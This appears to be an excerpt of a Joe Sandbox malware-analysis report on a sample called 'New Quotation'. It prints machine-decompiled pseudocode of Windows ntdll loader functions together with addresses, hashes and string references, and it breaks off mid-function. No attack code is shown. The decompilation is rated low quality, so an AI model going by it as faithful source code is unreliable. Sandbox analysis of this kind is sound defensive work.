                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f976d
                                                                                                                                                                                          0x1d7f976d
                                                                                                                                                                                          0x1d7f976d
                                                                                                                                                                                          0x1d7f976f
                                                                                                                                                                                          0x1d7f9777
                                                                                                                                                                                          0x1d7f9782
                                                                                                                                                                                          0x1d7f978b
                                                                                                                                                                                          0x1d7f9849
                                                                                                                                                                                          0x1d7f9852
                                                                                                                                                                                          0x1d7f9857
                                                                                                                                                                                          0x1d7f9860
                                                                                                                                                                                          0x1d7f9865
                                                                                                                                                                                          0x1d7f9865
                                                                                                                                                                                          0x1d7f9796
                                                                                                                                                                                          0x1d7f97a2
                                                                                                                                                                                          0x1d83db13
                                                                                                                                                                                          0x1d83db13
                                                                                                                                                                                          0x1d7f97aa
                                                                                                                                                                                          0x1d7f97af
                                                                                                                                                                                          0x1d7f97b1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f976d
                                                                                                                                                                                          0x1d7f974d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9753
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                          • API String ID: 3446177414-2283098728
                                                                                                                                                                                          • Opcode ID: 20e8a6dddca2474309d6db33fb79787666769ea76724ac88bf84bcb6d4736f00
                                                                                                                                                                                          • Instruction ID: 07667a7daaa585ff4c737a0d98cfecfeb731155f081f056e1464e15ea825de39
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20e8a6dddca2474309d6db33fb79787666769ea76724ac88bf84bcb6d4736f00
                                                                                                                                                                                          • Instruction Fuzzy Hash: EA51E235608742DFC721DF38D884B6D77A1BB88634F154A2EE5A6873A1D770E844CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                          			E1D80C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E1D7F0130();
				if(_t25 != 0) {
					L1D7E2330(_t25, 0x1d8c5b5c);
					_t27 =  *0x1d8c9224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E1D7C9050( *0x1d8c921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E1D7E24D0(0x1d8c5b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x1d8cb370 ^ _t87;
							_t76 = _t65;
							 *0x1d8c91e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x1d8c660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E1D85CB20(0x1d8c5b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x1d8c6608 & 0x0000ffff) + 2 + _t67;
									_t42 = E1D7E5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E1D7F10D0(_t67,  &_v572, 0x1d8c6608);
										E1D7F10D0(_t67,  &_v580,  &_v572);
										E1D7DFE40(_t67,  &_v588, ";");
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8c660c);
										 *0x1d8c6608 = _v608;
										_t54 = _v604;
										 *0x1d8c660c = _t54;
										 *0x1d8c6604 = _t54;
										E1D85D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x1d8c37c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D84E692();
											_t56 =  *0x1d8c37c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E1D814B50(_t39, 0x1d8c5b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x1d8c9224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E1D7C9050( *0x1d8c921c, 1);
								}
							}
							_t25 = E1D7E24D0(0x1d8c5b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}




































                                                                                                                                                                                          0x1d80c640
                                                                                                                                                                                          0x1d80c642
                                                                                                                                                                                          0x1d80c644
                                                                                                                                                                                          0x1d80c645
                                                                                                                                                                                          0x1d80c647
                                                                                                                                                                                          0x1d80c64e
                                                                                                                                                                                          0x1d80c65a
                                                                                                                                                                                          0x1d80c65f
                                                                                                                                                                                          0x1d80c664
                                                                                                                                                                                          0x1d80c666
                                                                                                                                                                                          0x1d80c668
                                                                                                                                                                                          0x1d80c6a4
                                                                                                                                                                                          0x1d80c6a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80c6a8
                                                                                                                                                                                          0x1d80c6a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80c6a8
                                                                                                                                                                                          0x1d80c66a
                                                                                                                                                                                          0x1d80c66a
                                                                                                                                                                                          0x1d80c66c
                                                                                                                                                                                          0x1d80c675
                                                                                                                                                                                          0x1d80c675
                                                                                                                                                                                          0x1d80c67a
                                                                                                                                                                                          0x1d80c67d
                                                                                                                                                                                          0x1d80c6ab
                                                                                                                                                                                          0x1d80c6ac
                                                                                                                                                                                          0x1d80c6b3
                                                                                                                                                                                          0x1d80c6b4
                                                                                                                                                                                          0x1d80c6be
                                                                                                                                                                                          0x1d80c6cb
                                                                                                                                                                                          0x1d80c6dc
                                                                                                                                                                                          0x1d80c6df
                                                                                                                                                                                          0x1d80c6e9
                                                                                                                                                                                          0x1d80c6e9
                                                                                                                                                                                          0x1d80c6eb
                                                                                                                                                                                          0x1d848090
                                                                                                                                                                                          0x1d84809b
                                                                                                                                                                                          0x1d8480a4
                                                                                                                                                                                          0x1d8480a9
                                                                                                                                                                                          0x1d8480ae
                                                                                                                                                                                          0x1d84817f
                                                                                                                                                                                          0x1d848183
                                                                                                                                                                                          0x1d848188
                                                                                                                                                                                          0x1d848189
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8480b4
                                                                                                                                                                                          0x1d8480c4
                                                                                                                                                                                          0x1d8480cc
                                                                                                                                                                                          0x1d8480d1
                                                                                                                                                                                          0x1d8480d5
                                                                                                                                                                                          0x1d8480d7
                                                                                                                                                                                          0x1d848114
                                                                                                                                                                                          0x1d848116
                                                                                                                                                                                          0x1d84811b
                                                                                                                                                                                          0x1d84812a
                                                                                                                                                                                          0x1d848139
                                                                                                                                                                                          0x1d848148
                                                                                                                                                                                          0x1d84815e
                                                                                                                                                                                          0x1d848167
                                                                                                                                                                                          0x1d84816c
                                                                                                                                                                                          0x1d848170
                                                                                                                                                                                          0x1d848175
                                                                                                                                                                                          0x1d84817a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8480d9
                                                                                                                                                                                          0x1d8480d9
                                                                                                                                                                                          0x1d8480de
                                                                                                                                                                                          0x1d8480e0
                                                                                                                                                                                          0x1d8480e2
                                                                                                                                                                                          0x1d8480e7
                                                                                                                                                                                          0x1d8480e9
                                                                                                                                                                                          0x1d8480ee
                                                                                                                                                                                          0x1d8480f3
                                                                                                                                                                                          0x1d8480f8
                                                                                                                                                                                          0x1d8480fd
                                                                                                                                                                                          0x1d848102
                                                                                                                                                                                          0x1d848102
                                                                                                                                                                                          0x1d848105
                                                                                                                                                                                          0x1d848107
                                                                                                                                                                                          0x1d848109
                                                                                                                                                                                          0x1d848109
                                                                                                                                                                                          0x1d84810a
                                                                                                                                                                                          0x1d84810a
                                                                                                                                                                                          0x1d8480d7
                                                                                                                                                                                          0x1d80c6f1
                                                                                                                                                                                          0x1d80c6f1
                                                                                                                                                                                          0x1d80c6f1
                                                                                                                                                                                          0x1d80c6f1
                                                                                                                                                                                          0x1d80c6f1
                                                                                                                                                                                          0x1d80c6fa
                                                                                                                                                                                          0x1d80c6fb
                                                                                                                                                                                          0x1d80c705
                                                                                                                                                                                          0x1d80c67f
                                                                                                                                                                                          0x1d80c67f
                                                                                                                                                                                          0x1d80c67f
                                                                                                                                                                                          0x1d80c680
                                                                                                                                                                                          0x1d80c680
                                                                                                                                                                                          0x1d80c685
                                                                                                                                                                                          0x1d80c687
                                                                                                                                                                                          0x1d80c689
                                                                                                                                                                                          0x1d80c68b
                                                                                                                                                                                          0x1d80c68d
                                                                                                                                                                                          0x1d80c697
                                                                                                                                                                                          0x1d80c697
                                                                                                                                                                                          0x1d80c68d
                                                                                                                                                                                          0x1d80c69d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80c69d
                                                                                                                                                                                          0x1d80c67d
                                                                                                                                                                                          0x1d80c650
                                                                                                                                                                                          0x1d80c650
                                                                                                                                                                                          0x1d80c653
                                                                                                                                                                                          0x1d80c653

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 1D8480E9
                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1D8480F3
                                                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 1D8480E2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 3446177414-1783798831
                                                                                                                                                                                          • Opcode ID: 663683233297036e988a280e6e855f567f6d771b7fd8edfbc55491456c42d63c
                                                                                                                                                                                          • Instruction ID: 3c961ecdc5159a04134588b052bc0ef1591645fd9e0b856b7a48e9c78192fc9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 663683233297036e988a280e6e855f567f6d771b7fd8edfbc55491456c42d63c
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC41D375518315EBC721DF24EC85B9B77F8EF486A4F01492AF96897260EB34E800CB97
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8543D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                          			E1D8543D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E1D854B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x1d8c6714; // 0x0
				_v16 = _t68;
				_t69 =  *0x1d8c6710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x1d8c6710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E1D854528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E1D854528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x1d8c5ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x1d8c37c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x1d8c37c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E1D84E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x1d8c91e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}


























                                                                                                                                                                                          0x1d8543e2
                                                                                                                                                                                          0x1d8543e5
                                                                                                                                                                                          0x1d8543e7
                                                                                                                                                                                          0x1d8543f3
                                                                                                                                                                                          0x1d8543fa
                                                                                                                                                                                          0x1d854401
                                                                                                                                                                                          0x1d85440b
                                                                                                                                                                                          0x1d85440f
                                                                                                                                                                                          0x1d854414
                                                                                                                                                                                          0x1d854418
                                                                                                                                                                                          0x1d854420
                                                                                                                                                                                          0x1d854424
                                                                                                                                                                                          0x1d85442e
                                                                                                                                                                                          0x1d85442e
                                                                                                                                                                                          0x1d854426
                                                                                                                                                                                          0x1d854426
                                                                                                                                                                                          0x1d854426
                                                                                                                                                                                          0x1d854424
                                                                                                                                                                                          0x1d854433
                                                                                                                                                                                          0x1d85445e
                                                                                                                                                                                          0x1d854443
                                                                                                                                                                                          0x1d854445
                                                                                                                                                                                          0x1d85444b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8544c0
                                                                                                                                                                                          0x1d85446a
                                                                                                                                                                                          0x1d85446f
                                                                                                                                                                                          0x1d854471
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d854473
                                                                                                                                                                                          0x1d854479
                                                                                                                                                                                          0x1d85447b
                                                                                                                                                                                          0x1d8544d4
                                                                                                                                                                                          0x1d8544d4
                                                                                                                                                                                          0x1d8544db
                                                                                                                                                                                          0x1d8544de
                                                                                                                                                                                          0x1d8544e6
                                                                                                                                                                                          0x1d8544e9
                                                                                                                                                                                          0x1d8544ef
                                                                                                                                                                                          0x1d8544f9
                                                                                                                                                                                          0x1d8544fc
                                                                                                                                                                                          0x1d8544ff
                                                                                                                                                                                          0x1d854502
                                                                                                                                                                                          0x1d85451e
                                                                                                                                                                                          0x1d854523
                                                                                                                                                                                          0x1d8544c9
                                                                                                                                                                                          0x1d8544d1
                                                                                                                                                                                          0x1d8544d1
                                                                                                                                                                                          0x1d854489
                                                                                                                                                                                          0x1d85448f
                                                                                                                                                                                          0x1d854491
                                                                                                                                                                                          0x1d854493
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d854495
                                                                                                                                                                                          0x1d854498
                                                                                                                                                                                          0x1d85449a
                                                                                                                                                                                          0x1d85449c
                                                                                                                                                                                          0x1d8544b8
                                                                                                                                                                                          0x1d8544bb
                                                                                                                                                                                          0x1d8544bb
                                                                                                                                                                                          0x1d8544be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8544b2
                                                                                                                                                                                          0x1d8544b4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8544b6
                                                                                                                                                                                          0x1d8544b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8544b8
                                                                                                                                                                                          0x1d85449e
                                                                                                                                                                                          0x1d8544a0
                                                                                                                                                                                          0x1d8544a2
                                                                                                                                                                                          0x1d8544a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8544a6
                                                                                                                                                                                          0x1d8544a6
                                                                                                                                                                                          0x1d8544a6
                                                                                                                                                                                          0x1d8544a8
                                                                                                                                                                                          0x1d8544aa
                                                                                                                                                                                          0x1d8544ac
                                                                                                                                                                                          0x1d8544ac
                                                                                                                                                                                          0x1d8544b0
                                                                                                                                                                                          0x1d8544c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8544c4
                                                                                                                                                                                          0x1d85444d
                                                                                                                                                                                          0x1d854450
                                                                                                                                                                                          0x1d854450
                                                                                                                                                                                          0x1d854452
                                                                                                                                                                                          0x1d85445c
                                                                                                                                                                                          0x1d85445c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85445c
                                                                                                                                                                                          0x1d854454
                                                                                                                                                                                          0x1d854456
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d854458
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d854458
                                                                                                                                                                                          0x1d854447
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d854447
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 1D854519
                                                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D854508
                                                                                                                                                                                          • LdrpCheckRedirection, xrefs: 1D85450F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                          • API String ID: 3446177414-3154609507
                                                                                                                                                                                          • Opcode ID: f0814657ee4adc811478e8eb9267856275e829f606a45bb10a5eddaa0ab6cb67
                                                                                                                                                                                          • Instruction ID: e8b266b47f83d19a8311e26dc2d0f3acde262d7646bbdf29f494097cd269b1b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0814657ee4adc811478e8eb9267856275e829f606a45bb10a5eddaa0ab6cb67
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD41B172746621DFCB11CF5CC940E667BE4BF88A50F0646AAFD9897265D731E800CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D855B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 31%
                                                                                                                                                                                          			E1D855B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t21;
				intOrPtr _t36;
				void* _t38;
				void* _t40;

				_t36 = __ecx;
				_t21 = E1D7EDDA0(0, 0, 0x1d7a1b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t43 = _v8;
				if(E1D7ECF00(_t36, _t38, _v8, 0x1d7a1b78, 0,  &_v12, 0, _v0) >= 0) {
					_t43 = _v8;
					if(E1D7ECF00(_t36, _t38, _v8, 0x1d7a1b70, 0,  &_v20, 0, _v0) >= 0) {
						_t43 = _v8;
						if(E1D7ECF00(_t36, _t38, _v8, 0x1d7a1b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x1d8c91e0(0, L"Wow64 Emulation Layer", __edi);
							_t40 = _v12();
							if(_t40 != 0) {
								 *0x1d8c91e0(_t40, "true", 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x1d8c91e0(_t40);
								_v20();
							}
						}
					}
				}
				return E1D7ECD80(_t36, _t43);
			}












                                                                                                                                                                                          0x1d855b90
                                                                                                                                                                                          0x1d855ba6
                                                                                                                                                                                          0x1d855bad
                                                                                                                                                                                          0x1d855c51
                                                                                                                                                                                          0x1d855c51
                                                                                                                                                                                          0x1d855bb7
                                                                                                                                                                                          0x1d855bcd
                                                                                                                                                                                          0x1d855bd2
                                                                                                                                                                                          0x1d855be8
                                                                                                                                                                                          0x1d855bed
                                                                                                                                                                                          0x1d855c03
                                                                                                                                                                                          0x1d855c05
                                                                                                                                                                                          0x1d855c0f
                                                                                                                                                                                          0x1d855c18
                                                                                                                                                                                          0x1d855c1c
                                                                                                                                                                                          0x1d855c31
                                                                                                                                                                                          0x1d855c37
                                                                                                                                                                                          0x1d855c3a
                                                                                                                                                                                          0x1d855c3e
                                                                                                                                                                                          0x1d855c44
                                                                                                                                                                                          0x1d855c44
                                                                                                                                                                                          0x1d855c47
                                                                                                                                                                                          0x1d855c03
                                                                                                                                                                                          0x1d855be8
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: Wow64 Emulation Layer
                                                                                                                                                                                          • API String ID: 3446177414-921169906
                                                                                                                                                                                          • Opcode ID: 2b62e8216b33958e8a17dbff01c6122ce7bf5954bc04c22850c21c4cfcd48b99
                                                                                                                                                                                          • Instruction ID: 94c7519b8d4ce32442e303962257cd436b9b189a97594495098d4df61f5ed58b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b62e8216b33958e8a17dbff01c6122ce7bf5954bc04c22850c21c4cfcd48b99
                                                                                                                                                                                          • Instruction Fuzzy Hash: B721C77A50011DFFEB019AA4DD88DFFBB7DEF486EAF050195FA11A2110D634AE01DB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 21%
                                                                                                                                                                                          			E1D84EBD0(void* __ebx, intOrPtr __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t84;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr _t94;
				intOrPtr _t95;
				short* _t115;
				intOrPtr* _t118;
				intOrPtr _t125;
				intOrPtr _t127;
				signed char _t128;
				intOrPtr _t132;
				intOrPtr _t135;
				intOrPtr* _t136;
				intOrPtr _t139;
				void* _t141;

				_t128 = __edx;
				_push(0x58);
				_push(0x1d8acc00);
				E1D827BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t141 - 0x40)) = __edx;
				_t135 = __ecx;
				 *((intOrPtr*)(_t141 - 0x20)) = __ecx;
				_t118 = 2;
				 *((intOrPtr*)(_t141 - 0x28)) = _t118;
				 *(_t141 - 0x68) =  *(_t141 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t141 - 0x64)) = 0x1d84f550;
				 *((intOrPtr*)(_t141 - 0x60)) = E1D84F5D0;
				if( *((intOrPtr*)(_t141 + 0xc)) >= _t118) {
					_t115 =  *((intOrPtr*)(_t141 + 8));
					 *_t115 = 0;
					_t132 = 0;
				} else {
					_t132 = 0xc0000004;
					_t115 = 0;
				}
				 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
				 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
				if(_t135 == 0 || (_t128 & 0x00000002) != 0) {
					_t135 = _t141 - 0x68;
					 *((intOrPtr*)(_t141 - 0x20)) = _t135;
				}
				 *((intOrPtr*)(_t141 - 0x4c)) = _t135;
				_t84 = 0;
				_t136 =  *((intOrPtr*)(_t141 + 0x10));
				while(1) {
					 *(_t141 - 0x2c) = _t84;
					if(_t84 >= 1) {
						break;
					}
					 *((intOrPtr*)(_t141 - 0x44)) = 0x2800;
					 *(_t141 - 0x34) = 1;
					if(_t136 != 0) {
						 *_t136 = _t118;
					}
					if((_t128 & 0x00000002) != 0) {
						_t23 = 0x1d7a18a4 + _t84 * 0x14; // 0x1d84eaf0
						 *0x1d8c91e0();
						 *((intOrPtr*)( *_t23))();
						_t84 =  *(_t141 - 0x2c);
					}
					 *(_t141 - 4) =  *(_t141 - 4) & 0x00000000;
					_t86 = _t84 * 0x14;
					 *(_t141 - 0x38) = _t86;
